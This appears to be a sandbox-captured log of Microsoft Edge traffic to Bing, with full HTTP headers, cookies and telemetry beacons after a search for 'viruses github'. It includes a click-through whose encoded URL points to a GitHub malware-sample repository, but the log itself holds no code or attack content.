https://www.bing.com/ck/a?!&&p=90a1343f2bd13c44JmltdHM9MTcyODA4NjQwMCZpZ3VpZD0wNTg3OWFkZC0zZWY4LTZkNTQtMGY1OC04ZmQyM2ZkYjZjNzgmaW5zaWQ9NTEzMQ&ptn=3&ver=2&hsh=3&fclid=05879add-3ef8-6d54-0f58-8fd23fdb6c78&psq=viruses+github&u=a1aHR0cHM6Ly9naXRodWIuY29tL0RhMmRhbHVzL1RoZS1NQUxXQVJFLVJlcG8jOn46dGV4dD1HaXRIdWIgLSBEYTJkYWx1cy9UaGUtTUFMV0FSRS1SZXBvOiBBIHJlcG9zaXRvcnkgZnVsbCBvZiBtYWx3YXJlIHNhbXBsZXMuIFRoaXM&ntb=1

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /ck/a?!&&p=90a1343f2bd13c44JmltdHM9MTcyODA4NjQwMCZpZ3VpZD0wNTg3OWFkZC0zZWY4LTZkNTQtMGY1OC04ZmQyM2ZkYjZjNzgmaW5zaWQ9NTEzMQ&ptn=3&ver=2&hsh=3&fclid=05879add-3ef8-6d54-0f58-8fd23fdb6c78&psq=viruses+github&u=a1aHR0cHM6Ly9naXRodWIuY29tL0RhMmRhbHVzL1RoZS1NQUxXQVJFLVJlcG8jOn46dGV4dD1HaXRIdWIgLSBEYTJkYWx1cy9UaGUtTUFMV0FSRS1SZXBvOiBBIHJlcG9zaXRvcnkgZnVsbCBvZiBtYWx3YXJlIHNhbXBsZXMuIFRoaXM&ntb=1 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
ect: 4g
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149

Response

HTTP/1.1 200 OK

Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1416
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: 6774BA254D464719A766D5E4B331740F Ref B: LON601060102042 Ref C: 2024-10-05T16:06:02Z
Date: Sat, 05 Oct 2024 16:06:03 GMT
Connection: keep-alive
Set-Cookie: MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; domain=.bing.com; expires=Thu, 30-Oct-2025 16:06:02 GMT; path=/; Partitioned; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.86777b5c.1728144362.1154e5ca
GET

https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.TabFocusChanged&DATA=%5B%7B%22T%22%3A%22CI.TabFocusChanged%22%2C%22TS%22%3A1728144443407%2C%22Name%22%3A%22visible%22%2C%22FID%22%3A%22TabFocused%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&TYPE=Event.TabFocusChanged&DATA=%5B%7B%22T%22%3A%22CI.TabFocusChanged%22%2C%22TS%22%3A1728144443407%2C%22Name%22%3A%22visible%22%2C%22FID%22%3A%22TabFocused%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:24 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.86777b5c.1728144444.11554182
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /fd/ls/lsp.aspx HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 605
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o

Response

HTTP/1.1 204 No Content

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:24 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.86777b5c.1728144444.1157e4f5
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /fd/ls/lsp.aspx HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 628
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o

Response

HTTP/1.1 204 No Content

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:27 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.86777b5c.1728144447.1157e8bd
GET

https://www.bing.com/fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.tweenToggle%22,%22FID%22:%22CI%22,%22Name%22:%22showTools%22,%22Text%22:%221%22}]

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=1D2FDF991A984BF98138E4B738C9DC15&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.tweenToggle%22,%22FID%22:%22CI%22,%22Name%22:%22showTools%22,%22Text%22:%221%22}] HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.86777b5c.1728144449.1157f608
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /fd/ls/lsp.aspx HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 920
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=viruses+github&qs=LT&pq=viruses+gi&sc=10-10&cvid=0DD30F05AB304142B388EAD39E0E9879&FORM=QBRE&sp=1&ghc=1&lq=0
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o

Response

HTTP/1.1 204 No Content

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.86777b5c.1728144452.1158033b
GET

https://www.bing.com/qbox?query=an&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=36b717de75bd4c4da73a50f9f7f1963d&oit=1&cp=2&pgcl=4

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /qbox?query=an&language=en-US&pt=EdgBox&cvid=022a575194584b82b44d42fc59134688&ig=36b717de75bd4c4da73a50f9f7f1963d&oit=1&cp=2&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
